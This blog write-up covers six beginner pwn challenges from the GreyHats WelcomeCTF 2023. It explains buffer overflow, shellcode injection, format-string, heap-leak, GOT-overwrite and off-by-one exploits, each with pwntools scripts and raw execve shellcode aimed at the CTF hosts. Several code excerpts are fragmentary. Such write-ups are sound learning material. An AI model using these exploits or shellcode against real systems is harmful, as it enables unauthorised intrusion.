GreyHats WelcomeCTF 2023: Pwn

Derusting my Pwn

Table of Contents


Yes, I’m alive. It’s been 2 years but I’m back, finally. And I’m in school again which means my brain will be restarting after the past 2 years of brain rot serving National Service. What better way to relight the light blub in my head than to do a fun and (generally) easier CTF like the Greyhats WelcomeCTF which is designed for beginners and (somewhat) experienced players. I will just cover all the pwn challenges that I managed to clear in here, and if there’re any other misc challenges or challenges from other categories that I feel like writing about I’ll probably make a separate post about them. I’m following Greyhats’ convention: 🍼 emoji means the challenge is meant to be easy. Disclaimer before yall start reading, my solutions are in no way elegant, please go easy on me yeah… (challenge setters if you’re reading this, please forgive me if I did not use your intended solution)

ScissorsPaperPwn 🍼 | 83 solves 50 pts

Starting off nice and easy is ScissorsPaperPwn. The source code is provided, and upon opening up it seems like a simple CLI game-styled challenge. It’s a game of scissors paper stone, but the computer is programmed to always win. The goal is to win this game and the flag would be given to us. The most important function, main() is as shown below:

char buf[32];
int score = 0, result;
int playerChoice, aiChoice;

int main() {

    while (score < 10) {
        printf("Current score: %d\n", score);
        printf("0: Scissors\n");
        printf("1: Paper\n");
        printf("2: Stone\n");

        memset(buf, 0, 32);
        printf("Your choice: ");
        playerChoice = atoi(buf);
        aiChoice = generateAIChoice(playerChoice);

        if (aiChoice < 0) {

        result = getResult(playerChoice, aiChoice);
        switch (result) {
            case 0: // Draw
            case 1: // Win
                printf("You win! How??\n\n");
            case -1: // Lose
                printf("You lose! Ha >:)\n\n");

    printf("You win! How did you even %d points?!?\n", score);
    printf("As promised, here is the flag:\n");

    return 0;

It’s immediately obvious that the vulnerable function here is gets(buf) which doesn’t do any checks, allowing us to attack it via buffer overflow. The size of the buffer is 32 bytes. Honestly speaking, I don’t think there’s much to go into for this one because the moment I opened up GDB to test out a basic overflow 'a'*33, it caused the while loop to break due to the 1 byte overflow and the code reached this portion:

printf("You win! How did you even %d points?!?\n", score);
printf("As promised, here is the flag:\n");

I tested the same solution on the host and it gave me the flag.

#!usr/bin/env python
from pwn import *
r = remote("",21212)
payload = b"a"*33
r.recvuntil(b'here is the flag:')
print("Flag: "+r.recvline())

Flag: greyhats{Game_hacker_in_the_making?}

Sweet and simple, the purest form of pwn. Have a picture of a cute cat as a bonus :)

Complete Me 🍼 | 19 solves 460 pts

This challenge was interesting but also pretty easy to tackle. Similarly, the source code and an ELF has been provided:

#include <stdlib.h>
#include <sys/mman.h>
#include <stdio.h>
#include <stdint.h>

int main() {

	setbuf(stdin, 0);
	setbuf(stdout, 0);

	void (*print_flag)(void);
	char* code = mmap(0, 0x1000, 7, MAP_SHARED | MAP_ANONYMOUS, 0, 0);
	print_flag = (void(*)(void))code;

	printf("The flag is: ");
	fgets(code, 0x1000, stdin);


This is literally just a program that would take your inputted bytes, place them into memory and then execute it. There are no checks, no traps, nothing that can really be seen here. So let’s just try sending shellcode via our input:

#!usr/bin/env python
from pwn import *

r = remote("",21238)

shellcode = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"

r.recvuntil(": ")

Yes, I just used some old shellcode I had lying around. There’s also the “cleaner” way of doing this by making use of pwntools:

shellcode = asm(

Or if you wanted to flex:

shellcode = asm("""
mov rax, 0x3b
mov rbx, 0x68732f6e69622f
push rbx
mov rdi, rsp
mov rsi, 0
mov rdx, 0

Either way, we input our shellcode and we pop a shell, after which we can simply cat flag.txt and bring it home.

Flag: greyhats{y0u_4r3_4n_4553mb1y_pr0}

fsa 🍼 | 19 solves 460 pts

Good ol’ format string. Sourcecode fma.c is provided for this challenge and this is what we see inside:

#include <stdio.h>

char flag[] = "greyhats{REDACTED}";

void vulnerable_function() {
    char buffer[100];
    printf("Flag is at %p\nEnter your input: \n", &flag);
    fgets(buffer, sizeof(buffer), stdin);

int main() {
	setbuf(stdin, 0);
	setbuf(stdout, 0);
    return 0;

We can see that the vulnerable function here is aptly named vulnerable_function() which has an unformatted printf(buffer). This means we printf() will effectively execute whatever format string we pass it. We can also see that the pointer to the flag would be printed for us in the first line before it asks for our input. We now pretty much have all the pieces of the puzzle should nothing else go wrong.

The first step usually to any format string is I’d try to check how far down the stack my input variables are being stored. We first do a simple input to find out more about our leakable stack:

We can see that starting from the 6th item it is already regurgitating what we’re passing to it. Let’s clean it up a bit as a mini proof-of-concept:

Perfect. Now all we need to do is to grab the flag address that is given to us, feed it to the app and let format string bring home the flag for us.

#!usr/bin/env python
from pwn import *

r = remote("",25236)

r.recvuntil("at ")
payload = p32(int(r.recvline().rstrip("\n"), 0))
payload += "%6$s"

r.recvuntil(": ")
print("Flag: greyhats"+r.recvline())

Flag: greyhats{f0rmAt_5trin9_vuln3rabi1ities_4r3_d4ngerous}

filelen | 15 solves 476 pts

This is where the challenges start to require some looking into. We are provided with the sourcecode and a binary. The following is the main() function:

int main() {
	char file_name[0x50];

	// measure file
	printf("Which file do you want to measure?\n> ");
	read(0, file_name, 0x50);
	char* nl = strchr(file_name, 0xa);
	if (nl)
		*nl = 0x0;

	// get name
	printf("The file is %ldcm long!\n\n", flag_len);
	char* name = get_name();
	printf("Goodbye %s!\n", name);

We can see that the program would ask us for a file that we wanted to “measure”. Afterwards it would call the get_name() function, store a (presumably) string in name and printf() some stuff afterwards.

Let’s take a look at measure(file_name) first.

void measure(const char* name) {
	FILE *f = fopen(name, "r");
	if (f) {
		fseek(f, 0, SEEK_END);
		flag_len = ftell(f);

Simple enough. Open file with name matching provided string with read permissions, seek through the file and return the length of the file. We could theoretically ask for the length of, say, flag.txt, which would dump all its contents on the heap. The heap is never actually properly cleared due to it needing to be efficient. We will get back to this later. There’s one more function that we’re interested in, which is get_name(), and it is as such:

char* get_name() {
	unsigned int size = 0;
	printf("Btw what is your name?\n");
	printf("Length: ");
	scanf("%u", &size);
	if (size <= 1 || size > 0x100) {
		printf("Invalid name length!");
	char* name = malloc(size);
	printf("Name: ");
	read(0, name, size);
	char* nl = strchr(name, 0xa);
	if (nl)
		*nl = 0x0;
	return name;

This function first asks for the length of your name, which is interesting to say the least. It makes sure that the length is not less than or equals to 1, and is not greater than 0x100. It then uses the read(0, name, size). read() does not put a nullbyte at the end of the input. This means we could potentially cause an information leak with this. If the string that read() obtains does not have a nullbyte, the next printf() or puts() that is used to output the buffer would just keep going until it reaches a nullbyte. Recall in the main() function earlier the following code is used:

char* name = get_name();
printf("Goodbye %s!\n", name);

Nice, let’s try something on the challenge host first.

Ok so we can dump flag.txt onto the heap. Since the variable size is passed to read(), we will just input, say, 100. And then we will pass an input with terminating nullbyte, and let the printf() sled run its way through. This is also explained quite well by Naetw’s amazing cheatsheet on pwn challenges:

Ok let’s try out our concept:

#!usr/bin/env python
from pwn import *
r = remote("",21235)
r.sendlineafter("> ", "flag.txt")
r.sendlineafter("Length: ", "100")
r.sendafter("Name: ", b'a'*1)
r.recvuntil("Goodbye a")
print("Flag: g"+r.recvline())

And there’s our flag.

Flag: greyhats{th3_fl4g_w4s_fr33_bu7_y0u_br0ught_1t_b4ck_bY_h34p_r3us3!}

Where GOT shell? | 11 solves 488 pts

From the name, I kinda assumed that it was a GOT table rewrite. This time round only the binary is provided to us, the source code isn’t provided. Let’s run the program to see what it does:

Ok this program seems to just take whatever address we pass it and directly write to said address. We can run a quick checksec on the binary to see if it has any protections.

Partial RELRO, no canary, no PIE. That means that whatever addresses that I get, I get to use. Nice. Since this already set itself up as a GOT rewrite, I’m looking out for the function that I can overwrite as well as the function that I will overwrite with. Let’s fire up IDA.

Roughly we can see that the program basically runs scanf() for %lx, scanf() for %lx again, then write the second input into the first input address. Pretty straight forward. Let’s look at the function table.

There is a win() function at 0x401176. The win() function will give us the flag:

Ok. Now we have the pieces in place. We can see earlier in the main() function that a final puts("Okay, exiting now...\n"); is called at the end before the program exits. This means theoretically we could use the 2 inputs to overwrite puts() in the GOT with the address of win(), then as the program exits, win() would be called. Let’s try out our theory:

#!usr/bin/env python
from pwn import *

e = context.binary = ELF("./got_shell")

puts = hex("0x")

win_addr = "401176"

r = remote("",26879)

print("Flag: "+r.recvuntil("}"))

We run our code and voila,

We obtained the flag.

Flag: greyhats{G0t_C4nc3r_y3T?_ad8123fa}

mew | 6 solves 497 pts

The final challenge that I solved is a lot more complex that the previous few, at least to me. This one is a C++ challenge, which made it slightly more annoying to do. We are provided the source code, binary and makefile of the challenge. Let’s take a look at our source code first. From a glance, it looks like a simple calculator as the challenge describes itself, with 5 options: read a number, write a number, sort numbers, re-initiate running mean and print statistics (running mean). Read/write a number would just accept an index input followed by an integer input. It’s worthy to note that the code was handled this way:

#define MAXSZ 100


int index; num value;
std::cout << "Enter index: ";
std::cin >> index;
if (index >= MAXSZ || index < 0) {
    std::cout << "Bad index!" << std::endl;
std::cout << "Enter value: ";
std::cin >> value;
ARR[index] = value;

It does a direct cast of std::cin input to an integer variable value without any error handling, which means that we would not be allowed to input any non-integers lest we be sent into an infinite loop. While scouring through the code, I noticed this interesting thing in the sort() function.

typedef unsigned long long num;

void sort(num* arr, num len) {
    num tmp = 0;
    for(num i = 0; i <= len; i++) {
        for(num j = i; j <= len; j++) {
            if (arr[i] < arr[j]) continue;
            tmp = arr[i];
            arr[i] = arr[j];
            arr[j] = tmp;

It loops until <= len, instead of < len. But in our main() function when sort() is called, the following is passed to sort().

sort(ARR, MAXSZ);

Now this is interesting. As we saw above, MAXSZ is defined as 100, which is the size of the array! This means that if we sorted the array with these variables, we could potentially access an object on the stack at arr[100] if, say, said object is sorted into the array and our in-array object is sorted to index 100. Since arrays work just like pointers to the memory, this is definitely possible.

I wanted to test a proof of concept, so I entered an incredibly big number (16 digts) 9999999999999999 into the array and called the sort() function. When I looked at index 99 of the array afterwards, sure enough:

But what is this mysterious value that I managed to obtain? If we convert the number to base 16, we get the following “number” 7ffee0b67d68. Now this looks suspiciously like a pointer to a function to me, so I fired up gef to play around. This is what happens if we do the above and then select “Statistics” on the calculator, which would make a call to running_mean.

A segfault in the application occurs. It seems like the location that I overwrote at *arr+100 was affecting program execution when it tried to mov rcx, QWORD PTR[rax] after calling running_mean(). This is interesting because we can show the registers at this point of time:

When we convert the address of the rax register to decimal, we get back 9999999999999999, which was the number we inputted! This means that our concept worked and sorting the array with a value larger than 7ffee0b67d68 would replace 7ffee0b67d68 with our desired pointer. I then tried to see what would happen if I just passed along the address of win(), which we can find with disassem win in gdb.

We convert 0x5555555553f4 (at the very beginning of the system() call where /bin/sh is first loaded into a register) to decimal to get 93824992236532, and we replace our input with this to see if it does anything.

Another segfault. This time the address changed. It’s trying to access the address 0x5555aaaab22a. Hmm, at this point I was thinking it could be an offset issue. So I found the offset between the 2 pointers which in this case was 0x55555e36, and then I subtracted this offset from my input address. This gave me a new input value of 93823560578494. I then substituted this value and tested again.

I spawned shell! Now all that I need to do is to clean up the process and try it on the host machine. I would access shell then simply cat flag.txt for the flag.

#!usr/bin/env python
from pwn import *

r = remote("",24985)

win_input = "93823560578494"

# input win() address
r.sendlineafter("> ","1")
r.sendlineafter(": ","0")
r.sendlineafter(": ",win_input)
# call sort
r.sendlineafter("> ","3")
# call statistics
r.sendlineafter("> ","5")
# home free
r.sendline("cat flag.txt")

print("Flag: "+r.recvuntil("}"))

And just as expected

The flag is in front of us.

Flag: greyhats{mewtwo_19211231}


There were still 2 challenges, Late For School!! and Secure Blob Runner that I wasn’t able to complete largely due to a mix of my lack of experience and rusty abilities, though I strongly believe that they are very much solveable. The concept behind the challenges were all interesting and these 2 challenges provide a pretty clear path to how they’re meant to be solved, but I couldn’t get them in time. There were a few other simple non-pwn challenges that I solved as just a short break in between staring at code and terminal windows, I will probably do a very short all-in-one writeup for those as well.


I enjoyed this CTF quite a bit as I felt the pwn challenges were all pretty fun and simple. Even if the challenges weren’t made to be complicated, sometimes we should all appreciate being able to go back to our pwn roots and enjoy the simple challenges. No complicated obfuscation and cancerous canaries to shoot down. No sandboxes to escape and less hair to tear out. :)

I would like to thank the talented individuals at NUS Greyhats for coming up with the challenges and hosting this CTF for us. Even if this CTF does not have any prize money, it was still genuinely fun to do and I wouldn’t mind doing it again any other day just for practice.

Thanks for reading.

EDIT (Sept 2023): Just for clarity, I joined NUS Greyhats shortly after this post was published, but up until this post I still wasn’t a member. Hence, in the next post onwards, I talk about being a part of NUS Greyhats


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